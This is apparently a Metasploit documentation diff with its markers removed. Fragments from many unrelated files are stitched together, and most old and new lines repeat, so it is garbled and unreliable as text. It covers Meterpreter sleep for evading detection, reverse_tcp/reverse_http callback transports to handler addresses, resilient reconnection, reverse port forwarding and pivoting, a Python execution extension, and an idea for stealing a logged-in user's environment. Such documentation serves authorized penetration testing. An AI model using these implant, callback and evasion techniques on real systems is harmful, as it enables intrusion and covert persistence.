Revamped [[transport|./Meterpreter-Transport-Control.md]] implementations have provided support for resiliency even for TCP based communcations. Any session that isn't properly terminated by Metasploit will continue to function behind the scenes while Meterpreter attempts to re-establish communications with Metasploit.
Revamped [[transport|./Meterpreter-Transport-Control.md]] implementations have provided support for resiliency even for TCP based communications. Any session that isn't properly terminated by Metasploit will continue to function behind the scenes while Meterpreter attempts to re-establish communications with Metasploit.
It is also possible to control the behaviour of this functionality a little via the use of the various timeout values that can be specified when adding transports to the session, and also on the fly for the current transport. For full details, please see the [[timeout documentation|./Meterpreter-Timeout-Control.md]] for details on those timeout values.
@@ -16,7 +16,7 @@ During this dormant period, no socket is active, no requests are made, and no re
The interface to the sleep command looks like this:
```
```msf
meterpreter > sleep
Usage: sleep <time>
@@ -27,11 +27,11 @@ Usage: sleep <time>
shut down and restarted after the designated timeout.
```
As shown, `sleep` expects to be given a single postive integer value that represents the number of seconds that Meterpreter should be silent for. When run, the session will close, and then callback after the elapsed period of time. Given that Meterpreter lives in memory, this lack of communication will make it extremely difficult to track.
As shown, `sleep` expects to be given a single positive integer value that represents the number of seconds that Meterpreter should be silent for. When run, the session will close, and then callback after the elapsed period of time. Given that Meterpreter lives in memory, this lack of communication will make it extremely difficult to track.
The following shows a sample run where Meterpreter is put to sleep for 20 seconds, after which the session reconnects while the handler is still in background:
```
```msf
meterpreter > sleep 20
[*] Telling the target instance to sleep for 20 seconds ...
[+] Target instance has gone to sleep, terminating current session.
@@ -57,7 +57,7 @@ The data or time cost of uploading `metsrv`, `stdapi` and `priv` for every singl
It's hard to believe it possible, but in this case the following image could be considered a nightmare.
```
```msf
[*] Sending stage (173056 bytes) to xxx.xxx.xxx.xxx
[*] Meterpreter session 4684 opened ....
[*] Sending stage (173056 bytes) to xxx.xxx.xxx.xxx
@@ -95,7 +95,7 @@ With this shellcode stub wired into the DOS header, Metasploit adds the entire b
1. Loads the extension DLL into memory.
1. Calculates the size of the DLL.
1. Writes the size of the DLL as a 32-bit value to the configuration block.
1. Writes the entire body of the DLL, as-is, to the end of the conifiguration block.
1. Writes the entire body of the DLL, as-is, to the end of the configuration block.
Once the end of the list of extensions is reached, the last thing that is written to the payload buffer is a 32-bit representation of `0` (`NULL`) which indicates that the list of extensions has been terminated. This `NULL` value is what `metsrv` will look for when iterating through the list of extensions so that it knows when to stop. After this, any extension initialisation scripts are wired in (though that's beyond the scope of this article).
@@ -150,4 +150,4 @@ Congratulations, you're dancing with stageless Meterpreter!
At this point, all of the pre-loaded extensions have been loaded into Meterpreter and are available for use. However, Metasploit is yet to know about them. To initiate client-site wiring of any of the pre-loaded extensions, the user can just type `use <extension>` just like they used to. Metasploit will check to see if the extension already exists in the target instance, and if it does, it will skip the extension upload and just wire-up the functions on the client side. If the extension is missing, then it will upload it and wire-up the functions on the fly just like it always has done.
If you're working with `meterpreter_reverse_https`, you'll notice that when new shells come in they appear just like an orphaned instance. This is expected behaviour, because a stageless session can't and won't look any different to an old session that hasn't been in touch with Metasploit for a while.
If you're working with `meterpreter_reverse_https`, you'll notice that when new shells come in they appear just like an orphaned instance. This is expected behaviour, because a stageless session can't and won't look any different to an old session that hasn't been in touch with Metasploit for a while.
@@ -28,13 +28,13 @@ In the case of `HTTP/S` payloads it's slightly different because the protocols a
With `TCP` transports, communication "times out" when the time between the last packet and the current socket poll is greater than the communications timeout value. This happens when there are network related issues that prevent data from being transmitted between the two endpoints, but doesn't cause the socket to completely disconnect. With `HTTP/S` transports, the communication "times out" for the same reason, but the evaluation of the condition is slightly different in that failure can occur because there is either no response at all from the remote server, or the response to a `GET` request results in no acknowledgement.
By default, this value is set to `300` seconds (`5` minutes), but can be overidden by the user via the `SessionCommunicationTimeout` setting.
By default, this value is set to `300` seconds (`5` minutes), but can be overridden by the user via the `SessionCommunicationTimeout` setting.
If connectivity fails, or the communication is deemed to have timed out. Then the current transport is destroyed, and the next transport in the list of transports is invoked. From there, Meterpreter will use the Retry Total and Retry Wait values while attempting to re-establish a session with Metasploit.
#### Retry Total and Retry Wait
After a transport initialises inside Meterpreter, Meterpreter uses this transport to attempt to establish a new session with Metasploit. In some cases, Metasploit might not be availalble due to reasons like bad network connectivity, or a lack of configured listeners. If Meterpreter can't connect to Metasploit, it will attempt to retry for a period of time. Once that period of time expires, Meterpreter will deem this transport "dead" and will move to the next one in the transport list.
After a transport initialises inside Meterpreter, Meterpreter uses this transport to attempt to establish a new session with Metasploit. In some cases, Metasploit might not be available due to reasons like bad network connectivity, or a lack of configured listeners. If Meterpreter can't connect to Metasploit, it will attempt to retry for a period of time. Once that period of time expires, Meterpreter will deem this transport "dead" and will move to the next one in the transport list.
The total amount of time that Meterpreter will attempt to connect back to Metasploit on the given transport is indicated by the `retry total` value. That is, `retry total` is the total amount of time that Meterpreter will retry communication on the transport. The default value is `3600` seconds (`1` hour), and can be overridden via the `SessionRetryTotal` setting.
@@ -44,7 +44,7 @@ While the current time is within the `retry total` time, Meterpreter will consta
Meterpreter supports the querying and updating of each of these timeouts via the console. In order to get the current timeout settings, users can invoke the `get_timeouts` command, which returns all four of the current timeout settings (one for the global session, and three for the transport-specific settings). An example of which is shown below:
```
```msf
meterpreter > get_timeouts
Session Expiry : @ 2015-06-09 19:56:05
Comm Timeout : 100000 seconds
@@ -56,7 +56,7 @@ The `Session Expiry` value is rendered as an absolute local time so that the use
In order to update these values, users can invoke the `set_timeouts` command. Invoking it without parameters shows the help:
```
```msf
meterpreter > set_timeouts
Usage: set_timeouts [options]
@@ -69,7 +69,7 @@ OPTIONS:
-h Help menu
-t <opt> Retry total time (seconds)
-w <opt> Retry wait time (seconds)
-x <opt> Expiration timout (seconds)
-x <opt> Expiration timeout (seconds)
```
As the help implies, each of these settings takes a value that indicates the number of seconds. Each of the options of this command are optional, so the user can update only those values that they are interested in updating. When the command is invoked, Meterpreter is updated, and the result shows the updated values once the changes have been made.
@@ -77,7 +77,7 @@ In the case of the `-x` parameter, the value that is to be passed in should repr
The following example updates the session expiration timeout to be `2` minutes from "now", and changes the retry wait time to `3` seconds:
```
```msf
meterpreter > set_timeouts -x 120 -t 3
Session Expiry : @ 2015-06-02 22:45:13
Comm Timeout : 100000 seconds
@@ -86,7 +86,7 @@ Retry Wait Time : 2500 seconds
```
This command can be invoked any number of times while the session is valid, but as soon as the session has expired, Metepreter will shut down and it's game over:
```
```msf
meterpreter >
[*] 10.1.10.35 - Meterpreter session 2 closed. Reason: Died
```
@@ -26,7 +26,7 @@ Meterpreter has a new base command called `transport`. This is the hub of all tr
The following output shows the current help text for the `transport` command:
```bash
```msf
meterpreter > transport
Usage: transport <list|change|add|next|prev|remove> [options]
@@ -48,7 +48,7 @@ OPTIONS:
-T <opt> Retry total time (seconds) (default: same as current session)
-U <opt> Proxy username for HTTP/S transports (optional)
-W <opt> Retry wait time (seconds) (default: same as current session)
-X <opt> Expiration timout (seconds) (default: same as current session)
-X <opt> Expiration timeout (seconds) (default: same as current session)
-c <opt> SSL certificate path for https transport verification (optional)
-h Help menu
-i <opt> Specify transport by index (currently supported: remove)
@@ -65,7 +65,7 @@ OPTIONS:
The simplest of all the sub-commands in the `transport` set is `list`. This command shows the full list of currently enabled transport, and an indicator of which one is the "current" transport. The following shows the non-verbose output with just the default transport running:
```bash
```msf
meterpreter > transport list
Session Expiry : @ 2015-06-09 19:56:05
@@ -82,7 +82,7 @@ The above output shows that we have one transport enabled that is using `TCP`. W
The verbose version of this command shows more detail about the transport, but only in cases where extra detail is available (such as `reverse_http/s`). The following command shows the output of the `list` sub-command with the verbose flag (`-v`) after an `HTTP` transport has been added:
```bash
```msf
meterpreter > transport list -v
Session Expiry : @ 2015-06-09 19:56:05
@@ -98,7 +98,7 @@ Adding transports gives Meterpreter the ability to work on different transport m
The following command shows a simple example that adds a `reverse_http` transport to an existing Meterpreter session. It specifies a custom communications timeout, retry total and retry wait, and also specifies a custom user-agent string to be used for the HTTP requests:
```bash
```msf
meterpreter > transport add -t reverse_http -l 10.1.10.40 -p 5105 -T 50000 -W 2500 -C 100000 -A "Totes-Legit Browser/1.1"
[*] Adding new transport ...
[+] Successfully added reverse_http transport.
@@ -127,7 +127,7 @@ It is also possible to specify the following:
The following shows another example which adds another `reverse_tcp` transport to the transport list:
```bash
```msf
meterpreter > transport add -t reverse_tcp -l 10.1.10.40 -p 5005
[*] Adding new transport ...
[+] Successfully added reverse_tcp transport.
@@ -155,7 +155,7 @@ The three different ways to change transports are:
As an example, here is the current transport setup:
```bash
```msf
meterpreter > transport list
Session Expiry : @ 2015-06-09 19:56:05
@@ -168,7 +168,7 @@ Session Expiry : @ 2015-06-09 19:56:05
Moving to the next transport:
```bash
```msf
meterpreter > transport next
[*] Changing to next transport ...
[+] Successfully changed to the next transport, killing current session.
@@ -195,7 +195,7 @@ This output shows that we moved from the original `reverse_tcp` to the `reverse_
Moving to the next transport again takes the session to the second `reverse_tcp` listener:
```bash
```msf
meterpreter > transport next
[*] Changing to next transport ...
[+] Successfully changed to the next transport, killing current session.
@@ -218,7 +218,7 @@ Session Expiry : @ 2015-06-09 19:56:06
From here, moving backward sends Meterpreter back to the `reverse_http` listener:
```bash
```msf
meterpreter > transport prev
[*] Changing to previous transport ...
@@ -252,7 +252,7 @@ The command is similar to `add` in that it takes a subset of the parameters, and
* `-p` - The `LPORT` value.
* `-u` - This value is only required for `reverse_http/s` transports and needs to contain the URI of the transport in question. This is important because there might be multiple listeners on the same IP and port, so the URI is what differentiates each of the sessions.
```bash
```msf
[*] Starting interaction with 2...
meterpreter > transport list
@@ -282,7 +282,7 @@ Previously, Meterpreter only had built-in resiliency in the `HTTP/S` payloads an
The following shows Metasploit being closed and leaving the existing `TCP` session running behind the scenes:
```bash
```msf
meterpreter > transport list
Session Expiry : @ 2015-06-09 19:56:05
@@ -301,7 +301,7 @@ With Metasploit closed, the Meterpreter session has detected that the transport
The following output shows Metasploit being re-launched with the appropriate listeners, and the existing Meterpreter instance establishing a session automatically:
```bash
```msf
./msfconsole -r ~/msf.rc
[*] Starting the Metasploit Framework console...|
IIIIII dTb.dTb _.---._
@@ -63,7 +63,7 @@ Related open tickets (slightly broader than Meterpreter):
* PrependTokenSteal / PrependEnvironmentSteal: Basically with proxies and other perimeter defenses being SYSTEM doesn't work well. This would be an addition to a payload that would work to execute as SYSTEM but would then locate a logged in user and steal their environment to call back to the handler. Very useful when pivoting around with PSEXEC
* Binary installed death dates: A way putting a date in a binary where after that date the binary no longer functions would be useful and possibly even perform self-deletion. Time zones would be a tricky matter, but is something handled by many programmers already (probably just not in shellcode)
* Allow Meterpreter sesssions to resolve L3 addresses (#4793)
* Allow Meterpreter sessions to resolve L3 addresses (#4793)
* Track whether or not the current session has admin credentials (#4633)d
* Support Metasploit-side zlib compression of sessions
* Being able to use Meterpreter instances to easily forward commands & exfil
@@ -49,7 +49,7 @@ If you go to `metasploit-framework/documentation/modules`, you'll see that there
For example:
```
```msf
msf> use auxiliary/scanner/smb/smb_login
msf (smb_login)> info
@@ -4,7 +4,7 @@ Installers are built nightly for macOS, Windows (64-bit) and Linux. These insta
The following script invocation will import the Rapid7 signing key and setup the package for supported Linux and macOS systems:
```
```sh
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && \
chmod 755 msfinstall && \
./msfinstall
@@ -33,7 +33,7 @@ If you downloaded Metasploit from us, there is no cause for alarm. We pride our
### Windows silent installation
The PowerShell below will download and install the framework, and is suitable for automated Windows deployments. Note that, the installer will be downloaded to `$DownloadLocation` and won't be deleted after the script has run.
```
```powershell
[CmdletBinding()]
Param(
$DownloadURL = "https://windows.metasploit.com/metasploitframework-latest.msi",
@@ -1,7 +1,7 @@
# Install oracle InstantClient
InstantClient 10 is recommneded to allow you to talk with 8,9,10,&11 server versions.
InstantClient 10 is recommended to allow you to talk with 8,9,10,&11 server versions.
Go to <https://www.oracle.com/database/technologies/instant-client/downloads.html> and select the link corresponding to your UNIX PC's architecture. Example for Linux x64, use the Instant Client for Linux x86-64 link, which should take you to <https://www.oracle.com/database/technologies/instant-client/linux-x86-64-downloads.html>
@@ -95,7 +95,7 @@ IPv4 Active Routing Table
msf6 post(multi/manage/autoroute) >
```
All right so that's one way, but what if we wanted to do this manually? First off to flush all routes from the routing table, we will do `route flush` followed by `route` to double check we have successfully removed the entires.
All right so that's one way, but what if we wanted to do this manually? First off to flush all routes from the routing table, we will do `route flush` followed by `route` to double check we have successfully removed the entries.
```msf
msf6 post(multi/manage/autoroute) > route flush
@@ -290,7 +290,7 @@ Active sessions
#### Local Port Forwarding
To set up a port forward using Metasploit, use the `portfwd` command within a supported session's console such as the Meterpreter console. Using `portfwd -h` will bring up a help menu similar to the following:
```
```msf
meterpreter > portfwd -h
Usage: portfwd [-h] [add | delete | list | flush] [args]
@@ -309,7 +309,7 @@ meterpreter >
To add a port forward, use `portfwd add` and specify the `-l`, `-p` and `-r` options at a minimum to specify the local port to listen on, the report port to connect to, and the target host to connect to respectively.
```
```msf
meterpreter > portfwd add -l 1090 -p 443 -r 169.254.37.128
[*] Local TCP relay created: :1090 <-> 169.254.37.128:443
meterpreter >
@@ -338,7 +338,7 @@ Note that you may need to edit your `/etc/hosts` file to map IP addresses to giv
#### Listing Port Forwards and Removing Entries
Can list port forwards using the `portfwd list` command. To delete all port forwards use `portfwd flush`. Alternatively to selectively delete local port forwarding entries, use `portfwd delete -l <local port>`.
```
```msf
meterpreter > portfwd delete -l 1090
[*] Successfully stopped TCP relay on 0.0.0.0:1090
meterpreter > portfwd list
@@ -355,7 +355,7 @@ To set up a reverse port forward, use `portfwd add -R` within a supported sessio
For example to listen on port 9093 on a target session and have it forward all traffic to the Metasploit machine at 172.20.97.72 on port 9093 we could execute `portfwd add -R -l 4444 -L 172.20.97.73 -p 9093` as shown below, which would then cause the machine who have a session on to start listening on port 9093 for incoming connections.
```
```msf
meterpreter > portfwd add -R -l 4444 -L 172.20.97.73 -p 9093
[*] Local TCP relay created: 172.20.97.73:4444 <-> :9093
meterpreter > netstat -a
@@ -446,7 +446,7 @@ socks5 127.0.0.1 1080
The final final should look something like this:
```
```ini
# proxychains.conf VER 3.1
#
# HTTP, SOCKS4, SOCKS5 tunneling proxifier with DNS.
@@ -11,12 +11,12 @@ Unfortunately, at this point in time the extension only works inside x86 and x64
# Usage
As with any other extension that comes with Meterpreter, loading it is very simple:
```
```msf
meterpreter > use python
Loading extension python...success.
```
Once loaded, the help system shows the commands that come with the extension:
```
```msf
meterpreter > help
... snip ...
@@ -36,7 +36,7 @@ Each of these commands is discussed in detail below.
## python_execute
The `python_execute` command is the simplest of all commands that come with the extension, and provides the means to run single-shot lines of Python code, much in the same way that the normal Python interpreter functions from the command-line when using the `-c` switch. The full help for the command is as follows:
```
```msf
meterpreter > python_execute -h
Usage: python_execute <python code> [-r result var name]
@@ -50,13 +50,13 @@ OPTIONS:
-r <opt> Name of the variable containing the result (optional)
```
A very simple example of this command is shown below:
```
```msf
meterpreter > python_execute "print 'Hi, from Meterpreter!'"
[+] Content written to stdout:
Hi, from Meterpreter!
```
Notice that any output that is written to stdout is captured by Meterpreter and returned to Metasploit so that it's visible to the user. This also happens for anything written to stderr, as shown below:
```
```msf
meterpreter > python_execute "x = x + 1"
[-] Content written to stderr:
Traceback (most recent call last):
@@ -66,25 +66,25 @@ NameError: name 'x' is not defined
This handy feature now only allows users to see the output of their scripts, but it also means that any errors are completely visible too.
A more interesting example can be seen below:
```
```msf
meterpreter > python_execute "x = [y for y in range(0, 20) if y % 5 == 0]"
[+] Command executed without returning a result
```
The command above executes, but nothing was printed to stdout, or to stderr, and hence nothing was captured.
The good thing is that the Python extension is persistant across calls. This means that after the above command is executed, `x` is still present in the interpreter and can be accessed with another call:
```
The good thing is that the Python extension is persistent across calls. This means that after the above command is executed, `x` is still present in the interpreter and can be accessed with another call:
```msf
meterpreter > python_execute "print x"
[+] Content written to stdout:
[0, 5, 10, 15]
```
As useful as this is, developers may want to produce post-modules that make use of the data that a Python script has generated. Parsing stdout is not ideal in such a scenario, and hence this command provides the means for individual variables to be extracted directly using the `-r` paramter, as described by the help:
```
As useful as this is, developers may want to produce post-modules that make use of the data that a Python script has generated. Parsing stdout is not ideal in such a scenario, and hence this command provides the means for individual variables to be extracted directly using the `-r` parameter, as described by the help:
```msf
meterpreter > python_execute "x = [y for y in range(0, 20) if y % 5 == 0]" -r x
[+] x = [0, 5, 10, 15]
```
Note that this command requires the first parameter to be a string that contains code that needs to be executed. However, this string can be blank, resulting in no code being executed. This means that extraction of content generated in previous calls is still possible without executing more code, or rerunning previous code snippets just to make use of the `-r` parameter:
```
```msf
meterpreter > python_execute "" -r x
[+] x = [0, 5, 10, 15]
```
@@ -95,7 +95,7 @@ Sometimes, single-line execution isn't enough, or is cumbersome. The `python_imp
## python_import
This command allows for whole modules to be loaded from the attacker's machine an uploaded to the target interpreter. The full help is shown below:
```
```msf
meterpreter > python_import -h
Usage: python_import <-f file path> [-n mod name] [-r result var name]
@@ -114,8 +114,8 @@ OPTIONS:
Importing of module trees is still considered a _beta_ feature, but we encourage you to use it where possible and keep us informed of any issues you may face.
Consider the following script:
```
$ cat /tmp/drives.py
```python
# $ cat /tmp/drives.py
import string
from ctypes import windll
@@ -133,7 +133,7 @@ result = get_drives()
print result
```
The aim of this is to determine all the local logical drives and put the letters into a list. From there it prints that list to screen. The result of running the script is as follows:
```
```msf
meterpreter > python_import -f /tmp/drives.py
[*] Importing /tmp/drives.py ...
[+] Content written to stdout:
@@ -146,7 +146,7 @@ This command is also intended to allow for recursive loading of modules from the
## python_reset
It may get to a point where the content of the interpreter needs to be flushed. The `python_reset` command clears out all imports, libraries and global variables:
```
```msf
meterpreter > python_execute "x = 100"
[+] Command executed without returning a result
meterpreter > python_execute "print x"
@@ -244,7 +244,7 @@ It is not possible to delete transports using the python extension as this opens
### Bindings example
```
```msf
meterpreter > getuid
Server username: WIN-TV01I7GG7JK\oj
meterpreter > python_execute "import meterpreter.user; print meterpreter.user.getuid()"
@@ -8,18 +8,18 @@ Clone a new metasploit-framework.git repository:
Go there and check out every remote branch we've got. That way, if you screw up and delete something important, you can add it back in later from this backup clone.
````
```
todb@presto:~/github/todb-r7$ cd msf-backup.git
`todb@presto:~/github/todb-r7/metasploit-framework$ for b in `git branch -r | grep -v "HEAD -> origin" | sed 's/^ origin\///'`; do git checkout -b $b --track origin/$b; done
````
```
Tarball it out of the way.
````
```
todb@presto:~/github/todb-r7$ cd ..
todb@presto:~/github$ tar zxvf msf-backup.git.tar.gz
todb@presto:~/github$ rm -rf msf-backup.git
````
```
# Make a new clone
@@ -35,10 +35,10 @@ First, wipe out anything that responds to prune. Usually that's not a lot.
Next, take a look at what's already merged and what's not. We can drop most of the merged stuff right away.
````
```
mazikeen:./msf-prune$ git branch -r --merged
mazikeen:./msf-prune$ git branch -r --no-merged
````
```
That gives a pretty good idea of how many branches we're talking about.
@@ -46,21 +46,21 @@ That gives a pretty good idea of how many branches we're talking about.
Here's a one-liner, lightly modified from http://stackoverflow.com/questions/2514172/listing-each-branch-and-its-last-revisions-date-in-git#2514279 which lists all remote **merged** branches in date order.
````
```
mazikeen:./msf-prune$ for k in `git branch -r --merged |grep -v "HEAD ->" | sed s/^..//`; do echo -e `git log -1 --pretty=format:"%Cgreen%ci %Cblue%cr%Creset" $k --`\\t"$k";done | sort
````
```
Count off how many you want to keep at the end, do the arithmetic, and tack on another couple pipes to catch everything that's more than two weeks old. These are the merged branches that nobody's likely to miss.
`````
```
mazikeen:./msf-prune$ for k in `git branch -r --merged |grep -v "HEAD ->" | sed s/^..//`; do echo -e `git log -1 --pretty=format:"%Cgreen%ci %Cblue%cr%Creset" $k --`\\t"$k";done | sort | head -45 | sed "s/^.*origin\///" > /tmp/merged_to_delete.txt
````
```
Pull the trigger:
````
```
mazikeen:./msf-prune$ for b in `cat /tmp/merged_to_delete.txt`; do echo Deleting $b && git push origin :$b; done
````
```
Note that we still have our tarball, so if we need to reinstate any of these branches, just need to re-push.
@@ -31,14 +31,14 @@ You can inspect exactly what commits are contained in this merge with the follow
Like so:
````
```
$ git log bad-merge...bad-merge~ --oneline
3996557 Fix conflcit lib/msf/util/exe.rb
6296c4f Merge pull request #9 from tabassassin/retab/pr/2320
d0a3ea6 Retab changes for PR #2320
bff7d0e Merge for retab
4c9e6a8 Default to exe-small
````
```
The syntax is a little wacky, but this is saying, "Show me all the commit hashes that occur from the `bad-merge` point to one back from `bad-merge` (in other words, from right before `bad-merge` was merged). That's what the tilde (~) means. You could also use `bad-merge^` or `bad-merge^1`, they're all equivalent.
@@ -4,9 +4,9 @@ If you're in the business of writing or collecting Metasploit modules that aren'
You must first set up a directory structure that fits with Metasploit's expectations of path names. What this typically means is that you should first create an "exploits" directory structure, like so:
````bash
```bash
mkdir -p $HOME/.msf4/modules/exploits
````
```
If you are using `auxiliary` or `post` modules, or are writing `payloads` you'll want to `mkdir` those as well.
@@ -14,9 +14,9 @@ If you are using `auxiliary` or `post` modules, or are writing `payloads` you'll
Modules are sorted by (somewhat arbitrary) categories. These can be anything you like; I usually use `test` or `private`, but if you are developing a module with an eye toward providing it to the main Metasploit distribution, you will want to mirror the real module path. For example:
````bash
```bash
mkdir -p $HOME/.msf4/modules/exploits/windows/fileformat
````
```
... if you are developing a file format exploit for Windows.
@@ -36,7 +36,7 @@ For full details:
If you already have msfconsole running, use a `reload_all` command to pick up your new modules. If not, just start msfconsole and they'll be picked up automatically. If you'd like to test with something generic, I have a module posted up as a gist, here: <https://gist.github.com/todb-r7/5935519>, so let's give it a shot:
````bash
```bash
mkdir -p $HOME/.msf4/modules/exploits/test
curl -Lo ~/.msf4/modules/exploits/test/test_module.rb https://gist.github.com/todb-r7/5935519/raw/17f7e40ab9054051c1f7e0655c6f8c8a1787d4f5/test_module.rb
todb@ubuntu:~$ mkdir -p $HOME/.msf4/modules/exploits/test
@@ -44,7 +44,7 @@ todb@ubuntu:~$ curl -Lo ~/.msf4/modules/exploits/test/test_module.rb https://gis
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 1140 0 1140 0 0 3607 0 --:--:-- --:--:-- --:--:-- 7808
````
```
Then, in my msfconsole window:
@@ -4,7 +4,7 @@ Recent changes to HTTP and HTTPS communications in both Meterpreter and its stag
The Windows API comes with two ways to talk via HTTP/S, they are [WinInet][] and [WinHTTP][]. The APIs are consumed in a similar fashion; many of the functions in each have the same interface, or are at least close enough to make a transition between the two rather trivial. However, there are some underlying differences that are important.
The [WinInet][] API was designed for use in desktop applications. It provides all the features required by applications to use HTTP/S while delegating much of the responsibilty of handling implementation detail to the underlying API and OS. This API can result in some user interface elements appearing if not handled correctly.
The [WinInet][] API was designed for use in desktop applications. It provides all the features required by applications to use HTTP/S while delegating much of the responsibility of handling implementation detail to the underlying API and OS. This API can result in some user interface elements appearing if not handled correctly.
[WinInet][] comes with some limitations, one of which is that it's close to impossible to do any kind of custom validation, parsing, or handling of SSL communications. One of the needs of Metasploit users is to be able to enable a [[Paranoid Mode|./meterpreter-paranoid-mode.md]] that forces Meterpreter to only talk with the appropriate endpoint. The goal is to prevent shells from being hijacked by unauthorised users. In order to do this, one of the things that was implemented was the verification of the SHA1 hash of the SSL certificate that Meterpreter reads from the server. If this hash doesn't match the one that Meterpreter is configured with, Meterpreter will shut down. [WinInet][] doesn't make this process possible without a _lot_ of custom work.
@@ -22,7 +22,7 @@ As indicated in a [blog post on MSDN][msdn_winhttp]:
What this means is that from Windows 7 and onwards, the underlying [WinHTTP][] implementation requires proper HTTP/1.1 support from any proxies that are used. If a proxy uses HTTP/1.0, such as Squid 2.7, and requires `Keep-Alive` support, such as NTLM authentication, then [WinHTTP][] will refuse to talk to it. Instead of downgrading, it will expect a purely RFC-compliant implementation, and instead will return a `407` error the client. This means that for Meterpreter to work, [WinHTTP][] can't be used.
In order to avoid this issue, [extra work][wininet_fallback] has beeen done to force Meterpreter to fall back to [WinInet][] when this happens. Given that [WinInet][] doesn't do certificate hash verification, this means that the user of Meterpreter loses the ability to use paranoid mode. It was decided that Meterpreter would not fallback to [WinInet][] if paranoid mode was enabled, as the intention of the user is clearly to avoid MITM.
In order to avoid this issue, [extra work][wininet_fallback] has been done to force Meterpreter to fall back to [WinInet][] when this happens. Given that [WinInet][] doesn't do certificate hash verification, this means that the user of Meterpreter loses the ability to use paranoid mode. It was decided that Meterpreter would not fallback to [WinInet][] if paranoid mode was enabled, as the intention of the user is clearly to avoid MITM.
To sum up, Meterpreter will use [WinHTTP][] where it can. If it can't, it'll fall back to [WinInet][] _unless_ paranoid mode is enabled.
@@ -27,7 +27,7 @@ If someone has library changes that cannot be merged to master, we cannot hang o
## Rescuing unstable modules
If you'd like to rescue an unstable module, great! Just note that it's an unstable rescue in the pull request, and the original PR number (if you can find it), when you pull it back out. You can do a similiar `git checkout` to grab the file and then `git mv` it to the right spot again.
If you'd like to rescue an unstable module, great! Just note that it's an unstable rescue in the pull request, and the original PR number (if you can find it), when you pull it back out. You can do a similar `git checkout` to grab the file and then `git mv` it to the right spot again.
## Safety
@@ -1,8 +1,259 @@
## Getting started
Depending on your skill level - if you have no experience with Metasploit, the following resources may be a better starting point:
Assuming you have installed Metasploit, either with the official Rapid7 nightly installers or through Kali, you can use the `msfconsole` command to open Metasploit:
* <http://www.offensive-security.com/metasploit-unleashed/Main_Page>
* <https://metasploit.help.rapid7.com/docs/>
* <https://www.kali.org/docs/tools/starting-metasploit-framework-in-kali/>
* <https://github.com/rapid7/metasploitable3>
```msf
_ _
/ \ /\ __ _ __ /_/ __
| |\ / | _____ \ \ ___ _____ | | / \ _ \ \
| | \/| | | ___\ |- -| /\ / __\ | -__/ | || | || | |- -|
|_| | | | _|__ | |_ / -\ __\ \ | | | | \__/| | | |_
|/ |____/ \___\/ /\ \\___/ \/ \__| |_\ \___\
=[ metasploit v6.3.35-dev-0fc88a8050 ]
+ -- --=[ 2357 exploits - 1227 auxiliary - 413 post ]
+ -- --=[ 1387 payloads - 46 encoders - 11 nops ]
+ -- --=[ 9 evasion ]
Metasploit Documentation: https://docs.metasploit.com/
msf6 >
```
### Finding modules
Metasploit is based around the concept of [[modules]]. The most commonly used module types are:
- Auxiliary - Auxiliary modules do not exploit a target, but can perform data gathering or administrative tasks
- Exploit - Exploit modules leverage vulnerabilities in a manner that allows the framework to execute arbitrary code on the target host
- Payloads - Arbitrary code that can be executed on a remote target to perform a task, such as creating users, opening shells, etc
- Post - Post modules are used after a machine has been compromised. They perform useful tasks such as gathering, collecting, or enumerating data from a session.
You can use the `search` command to search for modules:
```msf
msf6 > search type:auxiliary http html title tag
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/http/title normal No HTTP HTML Title Tag Content Grabber
Interact with a module by name or index. For example info 0, use 0 or use auxiliary/scanner/http/title
msf6 >
```
You can `use` a Metasploit module by specifying the full module name. The prompt will be updated to indicate the currently
active module:
```msf
msf6 > use auxiliary/scanner/http/title
msf6 auxiliary(scanner/http/title) >
```
### Running Auxiliary modules
Auxiliary modules do not exploit a target, but can perform data gathering or administrative tasks. For instance, a module
extracting the HTTP title from a server:
```msf
msf6 > use auxiliary/scanner/http/title
msf6 auxiliary(scanner/http/title) >
```
Each module offers configurable options which can be viewed with the `show options`, or aliased `options`, command:
```msf
msf6 auxiliary(scanner/http/title) > show options
Module options (auxiliary/scanner/http/title):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 80 yes The target port (TCP)
SHOW_TITLES true yes Show the titles on the console as they are grabbed
SSL false no Negotiate SSL/TLS for outgoing connections
STORE_NOTES true yes Store the captured information in notes. Use "notes -t http.title" to view
TARGETURI / yes The base path
THREADS 1 yes The number of concurrent threads (max one per host)
VHOST no HTTP server virtual host
View the full module info with the info, or info -d command.
msf6 auxiliary(scanner/http/title) >
```
To set a module option, use the `set command`. We will set the `RHOST` option - which represents the target host(s) that
the module will run against:
```msf
msf6 auxiliary(scanner/http/title) > set RHOSTS google.com
RHOSTS => google.com
```
The `run` command will run the module against the target, showing the target's HTTP title:
```msf
msf6 auxiliary(scanner/http/title) > run
[+] [142.250.180.14:80] [C:301] [R:http://www.google.com/] [S:gws] 301 Moved
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
New in Metasploit 6 there is added support for running modules with options set as part of the run command. For instance, setting
both `RHOSTS` and enabling `HttpTrace` functionality:
```msf
msf6 auxiliary(scanner/http/title) > run rhosts=google.com httptrace=true
####################
# Request:
####################
GET / HTTP/1.1
Host: google.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
####################
# Response:
####################
HTTP/1.1 301 Moved Permanently
Location: http://www.google.com/
Content-Type: text/html; charset=UTF-8
Server: gws
Content-Length: 219
<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>301 Moved</TITLE></HEAD><BODY>
<H1>301 Moved</H1>
The document has moved
<A HREF="http://www.google.com/">here</A>.
</BODY></HTML>
[+] [142.250.180.14:80] [C:301] [R:http://www.google.com/] [S:gws] 301 Moved
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/http/title) >
```
### Running exploit modules
Exploit modules require a vulnerable target. It is recommended to set up your own local test environment to run modules against.
For instance in a Virtual Machine, or with Docker. There are multiple pre-built vulnerable test environments including:
- [Metasploitable2](https://docs.rapid7.com/metasploit/metasploitable-2/)
